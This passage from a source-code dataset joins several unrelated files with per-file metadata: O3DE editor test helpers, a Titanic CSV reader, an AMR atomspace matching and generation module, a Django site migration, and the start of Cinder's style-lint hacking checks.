ground_plane.get_set_test(0, "Default Material|Material Asset", ground_plane_material_asset_value)
# Work around to add the correct Atom Mesh component
mesh_type_id = azlmbr.globals.property.EditorMeshComponentTypeId
ground_plane.components.append(
editor.EditorComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", ground_plane.id, [mesh_type_id]
).GetValue()[0]
)
ground_plane_mesh_asset_path = os.path.join("Objects", "plane.azmodel")
ground_plane_mesh_asset_value = get_asset_by_path(ground_plane_mesh_asset_path)
get_set_test(ground_plane, 1, "Controller|Configuration|Mesh Asset", ground_plane_mesh_asset_value)
# Create directional_light entity and set the properties
directional_light = Entity("directional_light")
directional_light.create_entity(
entity_position=math.Vector3(0.0, 0.0, 10.0),
components=["Directional Light"],
parent_id=default_level.id)
directional_light_rotation = math.Vector3(degree_radian_factor * -90.0, 0.0, 0.0)
azlmbr.components.TransformBus(
azlmbr.bus.Event, "SetLocalRotation", directional_light.id, directional_light_rotation)
# Create sphere entity and set the properties
sphere = Entity("sphere")
sphere.create_entity(
entity_position=math.Vector3(0.0, 0.0, 1.0),
components=["Material"],
parent_id=default_level.id)
sphere_material_asset_path = os.path.join("Materials", "Presets", "PBR", "metal_brass_polished.azmaterial")
sphere_material_asset_value = get_asset_by_path(sphere_material_asset_path)
sphere.get_set_test(0, "Default Material|Material Asset", sphere_material_asset_value)
# Work around to add the correct Atom Mesh component
sphere.components.append(
editor.EditorComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", sphere.id, [mesh_type_id]
).GetValue()[0]
)
sphere_mesh_asset_path = os.path.join("Models", "sphere.azmodel")
sphere_mesh_asset_value = get_asset_by_path(sphere_mesh_asset_path)
get_set_test(sphere, 1, "Controller|Configuration|Mesh Asset", sphere_mesh_asset_value)
# Create camera component and set the properties
camera = Entity("camera")
camera.create_entity(
entity_position=math.Vector3(5.5, -12.0, 9.0),
components=["Camera"],
parent_id=default_level.id)
rotation = math.Vector3(
degree_radian_factor * -27.0, degree_radian_factor * -12.0, degree_radian_factor * 25.0
)
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetLocalRotation", camera.id, rotation)
camera.get_set_test(0, "Controller|Configuration|Field of view", 60.0)
be_this_camera(camera.id)
def level_load_save(level_name, entities_to_search):
"""
Opens an existing level matching level_name, then optionally verifies certain expected entities exist in the level.
:param level_name: name of the level to load and then save, ex. "Emptylevel"
:param entities_to_search: list of entity names to search for in the level, ex. ["default_level", "sphere"]
:return:
"""
general.open_level_no_prompt(level_name)
helper.wait_for_condition(lambda: level_name in general.get_current_level_name(), 5.0)
# Ensure the level is saved by checking if all the entities are present
search_filter = azlmbr.entity.SearchFilter()
search_filter.names = entities_to_search
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == len(entities_to_search)
general.log(f"Level is saved successfully: {result}")
# Create new entity
temp_entity = Entity("temp_entity")
temp_entity.create_entity()
search_filter = azlmbr.entity.SearchFilter()
search_filter.names = ["temp_entity"]
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == 1
general.log(f"New entity created: {result}")
# Delete the new entity
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntityById", temp_entity.id)
result = len(entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)) == 0
general.log(f"New entity deleted: {result}")
general.save_level()
def verify_required_component_property_value(entity_name, component, property_path, expected_property_value):
"""
Compares the property value of component against the expected_property_value.
:param entity_name: name of the entity to use (for test verification purposes).
:param component: component to check on a given entity for its current property value.
:param property_path: the path to the property inside the component.
:param expected_property_value: The value expected from the value inside property_path.
:return: None, but prints to general.log() which the test uses to verify against.
"""
property_value = editor.EditorComponentAPIBus(
bus.Broadcast, "GetComponentProperty", component, property_path).GetValue()
general.log(f"{entity_name}_test: Property value is {property_value} "
f"which matches {expected_property_value}")
def take_screenshot_game_mode(screenshot_name, entity_name=None):
"""
Enters game mode & takes a screenshot, then exits game mode after.
:param screenshot_name: name to give the captured screenshot .ppm file.
:param entity_name: name of the entity being tested (for generating unique log lines).
:return:
"""
general.enter_game_mode()
helper.wait_for_condition(lambda: general.is_in_game_mode(), 2.0)
general.log(f"{entity_name}_test: Entered game mode: {general.is_in_game_mode()}")
ScreenshotHelper(general.idle_wait_frames).capture_screenshot_blocking(f"{screenshot_name}.ppm")
general.idle_wait(1.0)
general.exit_game_mode()
helper.wait_for_condition(lambda: not general.is_in_game_mode(), 2.0)
general.log(f"{entity_name}_test: Exit game mode: {not general.is_in_game_mode()}")
| 43.50596
| 141
| 0.720857
|
ee7629361ad0396ffd40a08da825ed558afbd26f
| 198
|
py
|
Python
|
Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 10
|
2021-04-06T23:45:09.000Z
|
2021-05-26T00:20:28.000Z
|
Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 37
|
2021-03-22T12:41:55.000Z
|
2021-06-29T00:42:50.000Z
|
Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 10
|
2020-05-19T23:23:29.000Z
|
2021-09-07T13:49:58.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 08:39:11 2020
@author: luisc
"""
import csv
arquivo = open('titanic.csv');
linhas = csv.reader(arquivo);
for linha in linhas:
print(linha)
| 12.375
| 35
| 0.636364
|
76e1792b5f47d6d8a073f3cf1c71e3c950522974
| 30,684
|
py
|
Python
|
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
import logging
import io
import random
import re
from copy import deepcopy
from contextlib import contextmanager
from opencog.atomspace import create_child_atomspace, Atom
from opencog.utilities import push_default_atomspace, pop_default_atomspace
from opencog.type_constructors import *
from opencog.bindlink import execute_atom
from amratom.triples import (TripleProcessor, PatternInstanceDict, AmrInstanceDict,
is_amr_set, is_const)
from amratom.atomese import (amr_value_atom, amr_concept_atom, TYPED_VAR, EVAL, TRUE,
FALSE, child_atomspace, default_atomspace)
from amratom.types import *
@contextmanager
def child_amr_atomspace(parent):
"""
Context manager which creates a child AMR atomspace of the passed one.
"""
amr_space = parent.child()
push_default_atomspace(amr_space.atomspace)
try:
yield amr_space
finally:
pop_default_atomspace()
class AmrAtomspace:
def __init__(self, atomspace):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.atomspace = atomspace
def child(self):
atomspace = create_child_atomspace(self.atomspace)
return AmrAtomspace(atomspace)
def add_triple(self, triple):
with default_atomspace(self.atomspace):
self.log.debug('add_triple: %s', triple)
source, role, target = triple
top_atom = amr_value_atom(source)
if role == ':instance':
AmrInstanceLink(top_atom, amr_concept_atom(target))
else:
if role.endswith("?"):
role = role[:-1]
optional = True
else:
optional = False
role_atom = AmrRole(role)
EvaluationLink(role_atom,
ListLink(
top_atom,
amr_value_atom(target)))
EvaluationLink(PredicateNode("is-optional"),
ListLink(top_atom, role_atom, amr_value_atom(target)),
tv=TRUE if optional else FALSE)
source_amr_concept = self.get_concepts_of_instance(top_atom)
if len(source_amr_concept) > 0 and source_amr_concept[0].is_a(types.AmrConcept):
EvaluationLink(PredicateNode("has-role"),
ListLink(source_amr_concept[0], role_atom))
def get_concept_instances(self, amr_concept):
with child_atomspace(self.atomspace) as atomspace:
# We don't apply type constraints on VariableNode("instance") here.
# Any type-checking should be used outside (e.g. one may want to
# detect unexpected types as KB errors)
# TODO? variable type can be added as an optional argument once needed
return execute_atom(atomspace,
GetLink(AmrInstanceLink(VariableNode("instance"), amr_concept))).out
def get_concepts_of_instance(self, amr_instance):
with child_atomspace(self.atomspace) as atomspace:
results = execute_atom(atomspace,
GetLink(AmrInstanceLink(amr_instance, VariableNode("concept")))).out
if len(results) > 1:
self.log.debug('get_concept: WARNING - multimple AmrInstanceLinks for %s', amr_instance.name)
return results
def get_relations(self, pred, arg0, arg1, var_types=None):
with child_atomspace(self.atomspace) as atomspace:
if var_types is not None:
vars = []
for arg, types in var_types.items():
if types is None:
vars.append(VariableNode(arg))
else:
types = types if isinstance(types, list) else [ types ]
vars.append(TYPED_VAR(arg, types))
results = execute_atom(atomspace,
GetLink(VariableList(*vars),
EvaluationLink(pred, ListLink(arg0, arg1))))
else:
results = execute_atom(atomspace,
GetLink(EvaluationLink(pred, ListLink(arg0, arg1))))
return [r.out if r.is_link() else r for r in results.out]
def get_concept_roles(self, arg0, arg1, var_types=None):
return self.get_relations(PredicateNode("has-role"), arg0, arg1, var_types)
def get_instance_roles(self, amr_instance):
return [self.get_relations(VariableNode("role"), amr_instance, VariableNode("right-inst"),
{"role": "AmrRole", "right-inst": None}),
self.get_relations(VariableNode("role"), VariableNode("left-inst"), amr_instance,
{"role": "AmrRole", "left-inst": None})]
def get_amrsets_by_concept(self, concept):
with child_atomspace(self.atomspace) as atomspace:
amrsets = []
results = execute_atom(atomspace, GetLink(
VariableList(
TypedVariableLink(VariableNode("amrset"),
TypeNode("AmrSet")),
TypedVariableLink(VariableNode("amrset-instance"),
TypeNode("AmrValue")),
VariableNode("concept")),
AndLink(
EvaluationLink(AmrRole(":amr-set"),
ListLink(VariableNode("amrset"),
VariableNode("amrset-instance"))),
AmrInstanceLink(VariableNode("amrset-instance"),
VariableNode("concept"))
)))
for x in results.out:
amrset, amrset_instance, concept_candidate = x.out
if concept_candidate.is_a(types.AmrVariable):
amrsets.append((amrset, amrset_instance))
elif concept_candidate.is_a(types.AmrSet):
amrsets.append((amrset, amrset_instance))
elif concept is not None and match_concept(concept, concept_candidate):
amrsets.append((amrset, amrset_instance))
return amrsets
def get_concept(self, concept):
with child_atomspace(self.atomspace) as atomspace:
results = execute_atom(atomspace, GetLink(
VariableList(
TypedVariableLink(VariableNode("parent"),
TypeChoice(
TypeNode("AmrConcept"),
TypeNode("AmrVariable"),
TypeNode("AmrSet")))),
AndLink(AmrInstanceLink(concept, VariableNode("parent")))
))
return results.out[0] if len(results.out) > 0 else None
_meaning_postfix_pattern = re.compile(r'-\d+$')
def match_concept(input, template):
if _meaning_postfix_pattern.search(template.name) is not None:
# the template specifies an exact meaning
return input.name == template.name
else:
meaning_pos = _meaning_postfix_pattern.search(input.name)
if meaning_pos is None:
return input.name == template.name
else:
return input.name[:meaning_pos.start(0)] == template.name
class AmrMatch:
def __init__(self, amrset, vars={}):
self.amrset = amrset
self.vars = vars
def __repr__(self):
return ('{ amrset: ' + repr(self.amrset) + ', vars: ' +
repr(self.vars) + ' }')
def __eq__(self, other):
return self.amrset == other.amrset and self.vars == other.vars
class AmrMatcher:
def __init__(self, space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.space = space
def match_amr_set(self, input_value, template_value, amrset):
self.log.debug("match_amr_set: input_value: %s, template_value: %s, amrset: %s",
input_value, template_value, amrset)
matches = []
for candidate in self.space.get_relations(AmrRole(":amr-set"), amrset, VariableNode("target")):
for match in self.match_amr_trees(input_value, candidate,
amrset_instance=template_value):
matches.append({ amrset: match })
return matches
def match_amr_trees(self, input_value, template_value, amrset_instance=None):
# match values
self.log.debug('match_amr_trees: input_value: %s, template_value: %s'
+ ', amrset_instance: %s', input_value, template_value,
amrset_instance)
if (input_value == template_value):
return [{}]
if template_value.is_a(types.AmrVariable):
matches = list(self.match_value(input_value))
if len(matches) == 0:
# instance AmrVariable
return [{ template_value: input_value }]
else:
result = []
for match in matches:
result.append({ template_value: { match.amrset: match.vars } })
return result
# match concepts
input_concept = self.space.get_concept(input_value)
template_concept = self.space.get_concept(template_value)
self.log.debug('match_amr_trees: input_concept: %s template_concept: %s',
input_concept, template_concept)
match = {}
if (input_concept is None and template_concept is None):
self.log.debug('match_amr_trees: different attributes')
return []
elif template_concept is None:
self.log.debug('match_amr_trees: template concept is None and input concept is not')
return []
elif input_concept is None:
self.log.debug('match_amr_trees: input concept is None and template concept is not')
return []
elif template_concept.is_a(types.AmrSet):
# hierarchical template
return self.match_amr_set(input_value, template_value,
template_concept)
elif template_concept.is_a(types.AmrVariable):
# parent AnchorNode
match[template_concept] = input_concept
elif not match_concept(input_concept, template_concept):
self.log.debug('match_amr_trees: different concepts')
return []
# match roles
return self.match_amr_roles(input_value, template_value, match,
amrset_instance)
class RoleMetadata:
def __init__(self, role):
self.role = role
self.targets = []
def match_amr_roles(self, input_value, template_value, match,
amrset_instance=None):
self.log.debug('match_amr_roles: input_value: %s, template_value: %s'
+ ', amrset_instance: %s', input_value, template_value,
amrset_instance)
input_roles = {}
for role, target in self.space.get_relations(VariableNode("role"),
input_value, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role not in input_roles:
input_roles[role] = set()
input_roles[role].add(target)
template_roles = {}
for role, target in self.space.get_relations(VariableNode("role"),
template_value, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role not in template_roles:
template_roles[role] = self.RoleMetadata(role)
template_roles[role].targets.append((template_value, target))
if amrset_instance is not None:
for role, target in self.space.get_relations(VariableNode("role"),
amrset_instance, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role.name == ':amr-set':
continue
if role not in template_roles:
template_roles[role] = self.RoleMetadata(role)
template_roles[role].targets.append((amrset_instance, target))
matches = [ match ]
absent_input_roles = set()
absent_template_roles = set(template_roles.keys())
has_role_wildcard = AmrRole(":*") in template_roles
for role in input_roles:
if role in template_roles:
absent_template_roles.remove(role)
else:
if role.name == ':pos' or has_role_wildcard:
continue
else:
absent_input_roles.add(role)
continue
for next_input_value in input_roles[role]:
for source, next_template_value in template_roles[role].targets:
new_matches = []
for res in self.match_amr_trees(next_input_value,
next_template_value):
for prev_match in matches:
new_match = prev_match.copy()
new_match.update(res)
new_matches.append(new_match)
# Here we stop on the first possible match for the role.
# There are may be other options to match role targets in
# other sequence, but we ignore this for now.
if len(new_matches) > 0:
template_roles[role].targets.remove((source, next_template_value))
break
matches = new_matches
if len(matches) == 0:
self.log.debug('match_amr_roles: no match input for role: '
+ '%s, value: %s, template_targets: %s',
role, next_input_value, template_roles[role].targets)
return []
absent_mandatory_roles = self.get_mandatory_roles(template_roles[role])
if len(absent_mandatory_roles) > 0:
self.log.debug("match_amr_roles: non optional template roles are " +
"absent in input_value: %s", absent_mandatory_roles)
return []
if len(absent_input_roles) > 0:
self.log.debug("match_amr_roles: input_value has roles which are " +
"not present in template_value: %s", absent_input_roles)
return []
for role in absent_template_roles:
absent_mandatory_roles = self.get_mandatory_roles(template_roles[role])
if len(absent_mandatory_roles) > 0:
self.log.debug("match_amr_roles: non optional template roles are " +
"absent in input_value: %s", absent_mandatory_roles)
return []
self.log.debug('match_amr_roles: matches found, vars: %s', matches)
return matches
def get_mandatory_roles(self, role_metadata):
mandatory_roles = []
for source, target in role_metadata.targets:
optional = self.is_optional_role(source, role_metadata.role, target)
if not optional:
mandatory_roles.append((role_metadata.role, source, target))
return mandatory_roles
def is_optional_role(self, template_value, role, target):
return (role == AmrRole(":*") or
EvaluationLink(PredicateNode("is-optional"),
ListLink(template_value, role, target)).tv == TRUE)
def match_value(self, value):
concept = self.space.get_concept(value)
self.log.debug("match_value: value: %s, concept: %s", value, concept)
for amrset, amrset_var in self.space.get_amrsets_by_concept(concept):
self.log.debug('match_value: try amrset: %s, instance: %s', amrset, amrset_var)
for match in self.match_amr_trees(value, amrset_var):
self.log.debug("match_value: found match: %s", match)
yield AmrMatch(amrset, match)
_single_word_pattern = re.compile(r'^\S+$')
class AmrTemplateInstance:
def __init__(self, match=None):
self.vars = {}
self.subint = []
if match:
self.amrset = match.amrset.name
self.subint, self.vars = self._unwrap_vars_rec(match.vars)
def _unwrap_vars_rec(self, vs):
subint = []
vacc = {}
for key, value in vs.items():
if isinstance(key, Atom) and key.name != '*':
if key.is_a(types.AmrSet):
subint_child, vacc_child = self._unwrap_vars_rec(value)
subint += [key.name] + subint_child
# Storing all subintent variables as a value for subintent
if len(vacc_child) > 0:
vacc[key.name] = vacc_child
# And also duplicate them in a flatten dict for convenience
vacc.update(vacc_child)
else:
assert key.is_a(types.AmrVariable), "Unsupported variable {0}".format(key)
vname = None
if isinstance(value, Atom):
vname = value.name
if vname.startswith('"') and vname.endswith('"'):
vname = vname[1:-1]
elif isinstance(value, dict):
vkey = list(value.keys())[0]
assert len(value) == 1 and isinstance(vkey, Atom) and vkey.is_a(types.AmrSet), \
"Expected only one AmrSet as variable value: {0} - {1}".format(key, value)
vname = vkey.name
subint_child, vacc_child = self._unwrap_vars_rec(value[vkey])
subint += [vname] + subint_child
if len(vacc_child) > 0:
vname = {vname: vacc_child}
vacc.update(vacc_child)
vacc[key.name] = vname
return subint, vacc
@classmethod
def from_values(cls, amrset, vars={}, subint=[]):
inst = cls()
inst.amrset = amrset
inst.vars = deepcopy(vars)
inst.subint = subint
return inst
def __repr__(self):
return ('{ amrset: ' + self.amrset + ', vars: ' +
repr(self.vars) + ' }' + ', subint: ' + repr(self.subint))
def __eq__(self, other):
return self.amrset == other.amrset and self.vars == other.vars and \
self.subint == other.subint
class PatternParser:
def __init__(self, amr_proc, amr_space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_proc = amr_proc
self.amr_space = amr_space
self.triple_proc = TripleProcessor(PatternInstanceDict)
self.utterance_parser = UtteranceParser(amr_proc, amr_space)
def parse(self, amr):
with default_atomspace(self.amr_space.atomspace):
parsed_amr = self.triple_proc.amr_to_triples(amr)
self._process_triples(parsed_amr)
return amr_value_atom(parsed_amr.top)
def load_file(self, file):
self._process_triples(self.triple_proc.file_to_triples(file))
def load_text(self, text):
with io.StringIO(text) as file:
self.load_file(file)
def _process_triples(self, triples):
for triple in triples:
if is_amr_set(triple) and is_const(triple[2]):
source, role, target = triple
no_quotes = target[1:-1]
if _single_word_pattern.search(no_quotes) is not None:
self.amr_space.add_triple(triple)
else:
top = self.utterance_parser.parse_sentence(no_quotes)
self.amr_space.add_triple((source, role, top.name))
else:
self.amr_space.add_triple(triple)
class UtteranceParser:
def __init__(self, amr_proc, amr_space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_proc = amr_proc
self.amr_space = amr_space
self.triple_proc = TripleProcessor(AmrInstanceDict)
# FIXME: NB: to have unique varible names we need importing all
# triples into triple_proc before processing
self.triple_proc.next_id = 500000;
def parse(self, text):
with default_atomspace(self.amr_space.atomspace):
sentences = []
amrs = self.amr_proc.utterance_to_amr(text)
for amr in amrs:
parsed_amr = self.triple_proc.amr_to_triples(amr)
for triple in parsed_amr:
self.amr_space.add_triple(triple)
sentences.append(amr_value_atom(parsed_amr.top))
return sentences
def parse_sentence(self, text):
sentences = self.parse(text)
assert len(sentences) == 1, 'Single sentence is expected as input'
return sentences[0]
class AmrGenerator:
def __init__(self, amr_space, amr_proc):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_space = amr_space
self.amr_proc = amr_proc
def recSubst(self, atom):
bSubst = True
with child_atomspace(self.amr_space.atomspace) as atomspace:
while bSubst and atom:
bSubst = False
if atom.is_a(types.AmrVariable):
if atom.name == '*':
# Just ignore wildcards since we can't guess their content
self.log.debug("recSubst: ignore *")
atom = None
else:
subst = execute_atom(atomspace,
GetLink(StateLink(atom, VariableNode("$state")))).out
for s in subst:
if not s.is_a(types.VariableNode):
if bSubst:
self.log.debug('recSubst: WARNING - additional value %s', s.name)
else:
self.log.debug('recSubst: AmrVariable %s --> %s', atom.name, s.name)
atom = s
bSubst = True
if not bSubst:
self.log.debug('recSubst: WARNING - no value for AmrVariable %s', atom.name)
else:
# Check if atom refers to AmrSet (set of tops of amr graphs)
amr_set = execute_atom(atomspace,
GetLink(EVAL(AmrRole(":amr-set"), atom, VariableNode("$top")))).out
if not atom.is_a(types.AmrSet) and len(amr_set) > 0:
self.log.debug('recSubst: WARNING - non-AmrSet atom %s has :amr-set role', atom.name)
if atom.is_a(types.AmrSet) and len(amr_set) == 0:
self.log.debug('recSubst: WARNING - AmrSet atom %s has no :amr-set role', atom.name)
if len(amr_set) > 0:
# Just choose randomly now. A more advanced strategy could be
# to filter out subgraphs from amr-set with AmrVariable lacking StateLinks
s = amr_set[random.randint(0, len(amr_set)-1)]
self.log.debug('recSubst: :amr-set substitution %s --> %s', atom.name, s.name)
atom = s
bSubst = True
return atom
def triplesFromFullGraph(self, topAtom):
self.log.debug('triplesFromFullGraph: generating %s', topAtom.name if topAtom else None)
topAtom = self.recSubst(topAtom)
triples = []
if not topAtom: return triples
parentName = parent = None
# identify parent name with substitutions
if topAtom.is_a(types.AmrValue):
pa = self.amr_space.get_concepts_of_instance(topAtom)
if len(pa) > 0:
# If the parent explicitly refers to an AmrSet, AmrSet will
# be sampled, and AmrValue will appear as a parent.
# It is difficult to track such situations in case of other
# recursive substitutions (e.g. with variables), so we simply assume
# that the situation of an AmrValue as the parent is valid and implies
# the necessity to merge two graphs referring to these AmrValues.
parent = self.recSubst(pa[0])
parentName = parent.name
children, _ = self.amr_space.get_instance_roles(topAtom)
connections = []
for child in children:
self.log.debug('triplesFromFullGraph: child %s %s %s', topAtom.name, child[0].name, child[1].name)
# Fixme? recSubst will be called second time for topAtom in recursion
# It's not a huge problem since it will do nothing, although it will generate warnings twice
atom2 = self.recSubst(child[1])
if not atom2 or atom2.is_a(types.VariableNode) or atom2.is_a(types.AmrVariable):
# TODO? Maybe, we need raise an exception for a non-optional role
continue
if child[0].name == ':pos':
# we consider :pos connected to constant attributes only now
if parentName:
parentName += "~"+atom2.name.replace("\"", "")
else:
self.log.debug('triplesFromFullGraph: WARNING - cannot add pos tag to %s', topAtom.name)
elif child[0].name == ':*':
self.log.debug('triplesFromFullGraph: ignoring :*')
continue
else:
# We don't consider optional roles here. They are represented by PredicateNode("is-optional")
# which is ignored here, and full graph is reconstructed.
# Controlling how to deal with optional roles in the generator can be added in future.
connections += [(topAtom.name, child[0].name, atom2)]
if parentName:
self.log.debug('triplesFromFullGraph: topAtom %s / %s', topAtom.name, parentName)
if parent.is_a(types.AmrConcept):
# topAtom is just an instance of AmrConcept
triples += [(topAtom.name, ":instance", parentName)]
elif parent.is_a(types.AmrVariable):
assert False, "AmrVariable {0} is not set".format(parent.name)
else:
assert parent.is_a(types.AmrValue), "Unexpected type of {0} after recSubst".format(parent.name)
# Generating subgraph to be merged
side_triples = self.triplesFromFullGraph(parent)
if len(side_triples) > 0:
for triple in side_triples:
if triple[0] == parentName:
# Substituting current top in place of the top of the graph to be merged
triples += [(topAtom.name, triple[1], triple[2])]
else:
triples += [triple]
# In case of (@game-name :amr-set "Bingo"), generateFull(AmrSet("@game-name")) will
# return an empty graph, because there are no triples. Generating single attribute value
# is not supported.
# elif len(connections) == 0:
# triples += [(topAtom.name, ':instance', None)]
# Just sorting alphabetically works reasonably well: :ARG0,1,2 go first
connections = sorted(connections, key = lambda n: n[1])
for c in connections:
child_triple = self.triplesFromFullGraph(c[2])
if len(child_triple) == 0:
# The special case of amr attribute that substitutes amr value.
# E.g. for (@game :amr-set "Bingo"), (name :op1 @game), we will have
# n / name pointing to g / @game, so we need to peek into g's parent
# to understand that we need not (n :op1 g) with triples for g,
# but (n :op1 "Bingo"), where "Bingo" is recSubst of g's parent.
parent2 = self.amr_space.get_concepts_of_instance(c[2])
if len(parent2) > 0:
parent2 = self.recSubst(parent2[0])
if not parent2 is None:
triples += [(c[0], c[1], parent2.name)]
continue
new_triples = [(c[0], c[1], c[2].name)] + child_triple
for tn in new_triples:
isNew = True
for tp in triples:
if tp[0] == tn[0] and tp[1] == tn[1]:
isNew = False
if tp[2] != tn[2] or tp[1] != ':instance':
self.log.debug('triplesFromFullGraph: WARNING - conflicting (%s %s %s) (%s %s %s)',
tp[0], tp[1], tp[2], tn[0], tn[1], tn[2])
if tp[2] != tn[2] and tp[1] != ':instance':
# "Do you have any other questions for me?" contains
# `:mod (o / other)` and `:mod (a2 / any)` simultaneously
isNew = True
# else do nothing - it is expected for :instance
if isNew:
triples += [tn]
return triples
def renameInsts(self, triples):
names = [t[0] for t in triples] + [t[2] for t in triples]
for i in range(len(triples)):
t = triples[i]
if t[1] != ':instance': continue
oldName = t[0]
newName = t[2][0] # oldName[0] also works, but it can produce w/i, when what-0015/$what is in graph
while newName in names:
if len(newName) == 1:
newName += newName[0]
elif len(newName) == 2:
newName += 'a'
else:
newName = newName[0:2] + chr(ord(newName[2])+1)
for j in range(len(triples)):
if triples[j][0] == oldName: triples[j] = (newName, triples[j][1], triples[j][2])
if triples[j][2] == oldName: triples[j] = (triples[j][0], triples[j][1], newName)
names += [newName]
return triples
def generateFull(self, topAtom):
triples = self.triplesFromFullGraph(topAtom)
r = self.renameInsts(triples)
text = self.amr_proc.triples_to_utterance(r) if r != [] else None
if text is None:
self.log.debug('generateFull: WARNING - No graph for topAtom %s', topAtom.name)
return text
| 46.77439
| 111
| 0.559249
|
5554a1593e734bb5a814947adb5878e8049db65d
| 526
|
py
|
Python
|
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | 10
|
2021-08-29T22:26:13.000Z
|
2022-03-20T15:31:39.000Z
|
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "lokl-30054.botics.co"
site_params = {
"name": "lokl",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| 20.230769
| 61
| 0.65019
|
3494c6ef31fd8f39c3ab276723124d5dd8672026
| 14,111
|
py
|
Python
|
cinder/tests/hacking/checks.py
|
cloudification-io/cinder
|
23d76e01f2b4f3771b57fb287084a4884238b827
|
[
"Apache-2.0"
] | 571
|
2015-01-01T17:47:26.000Z
|
2022-03-23T07:46:36.000Z
|
cinder/tests/hacking/checks.py
|
dFarui/cinder
|
b2922384054ddbd46e071fd07372a75a21d7f85d
|
[
"Apache-2.0"
] | 37
|
2015-01-22T23:27:04.000Z
|
2021-02-05T16:38:48.000Z
|
cinder/tests/hacking/checks.py
|
dFarui/cinder
|
b2922384054ddbd46e071fd07372a75a21d7f85d
|
[
"Apache-2.0"
] | 841
|
2015-01-04T17:17:11.000Z
|
2022-03-31T12:06:51.000Z
|
# Copyright (c) 2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import re
from hacking import core
"""
Guidelines for writing new hacking checks
- Use only for Cinder specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range N3xx. Find the current test with
the highest allocated number and then pick the next value.
- Keep the test method code in the source file ordered based
on the N3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to
cinder/tests/unit/test_hacking.py
"""
# NOTE(thangp): Ignore N323 pep8 error caused by importing cinder objects
UNDERSCORE_IMPORT_FILES = ['cinder/objects/__init__.py',
'cinder/objects/manageableresources.py']
mutable_default_args = re.compile(r"^\s*def .+\((.+=\{\}|.+=\[\])")
translated_log = re.compile(
r"(.)*LOG\.(audit|debug|error|info|warn|warning|critical|exception)"
r"\(\s*_\(\s*('|\")")
string_translation = re.compile(r"(.)*_\(\s*('|\")")
underscore_import_check = re.compile(r"(.)*i18n\s+import(.)* _$")
underscore_import_check_multi = re.compile(r"(.)*i18n\s+import(.)* _, (.)*")
# We need this for cases where they have created their own _ function.
custom_underscore_check = re.compile(r"(.)*_\s*=\s*(.)*")
no_print_statements = re.compile(r"\s*print\s*\(.+\).*")
dict_constructor_with_list_copy_re = re.compile(r".*\bdict\((\[)?(\(|\[)")
logging_instance = re.compile(
r"(.)*LOG\.(warning|info|debug|error|exception)\(")
assert_True = re.compile(
r".*assertEqual\(True, .*\)")
class BaseASTChecker(ast.NodeVisitor):
"""Provides a simple framework for writing AST-based checks.
Subclasses should implement visit_* methods like any other AST visitor
implementation. When they detect an error for a particular node the
method should call ``self.add_error(offending_node)``. Details about
where in the code the error occurred will be pulled from the node
object.
Subclasses should also provide a class variable named CHECK_DESC to
be used for the human readable error message.
"""
def __init__(self, tree, filename):
"""This object is created automatically by pep8.
:param tree: an AST tree
:param filename: name of the file being analyzed
(ignored by our checks)
"""
self._tree = tree
self._errors = []
def run(self):
"""Called automatically by pep8."""
self.visit(self._tree)
return self._errors
def add_error(self, node, message=None):
"""Add an error caused by a node to the list of errors for pep8."""
# Need to disable pylint check here as it doesn't catch CHECK_DESC
